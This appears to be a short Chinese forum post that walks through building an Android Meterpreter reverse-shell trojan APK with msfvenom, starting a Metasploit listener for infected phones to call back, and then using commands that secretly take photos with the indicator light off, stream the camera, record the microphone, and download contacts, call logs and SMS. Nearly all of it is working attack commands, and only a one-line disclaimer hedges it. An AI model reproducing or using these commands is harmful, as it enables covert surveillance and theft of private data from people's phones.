msfvenom -p android/meterpreter/reverse_tcp lhost=kali的ip lport=自定端口 R > 自己起名字.apk
例:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.111.111 lport=5555 R > 1.apk
msfconsole //启动msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.111.111 //这里的地址设置成我们刚才生成木马的IP地址
set lport 9999 //这里的端口设置成刚才我们生成木马所监听的端口
show options
exploit //开始执行漏洞,开始监听,等待手机上线
几项常用命令:
webcam_snap ,可开启受害者的摄像头自动拍摄一张照片并保存到Kali 虚拟机中。
dump_contacts,导出受害者手机通讯录里的信息到 Kali 虚拟机/root路径下。
sysinfo,查看手机系统信息。
ls,查看当前路径和文件。
sessions -l 是查看当前肉鸡触发的会话列表
sessions -i id 进入列表中的指定id
屏幕截图screenshot
闪照
webcam_snap -i 1 // 后置摄像头闪照
webcam_snap -i 2 // 前置摄像头闪照
webcam_snap -i 2 -v false // 前置摄像头闪照且没有指示灯亮起
通讯录下载
dump_contacts
通话记录下载
dump_calllog
短信下载
dump_sms
监控摄像头
webcam_stream
输入上面命令后,会输出一个随机的xxx.html
之后直接在浏览器上面访问xxx.html就可以看到实时的场景了
远程录音
record_mic -d 13
注:请勿用于违法用途,自己玩玩就好。
没有回复内容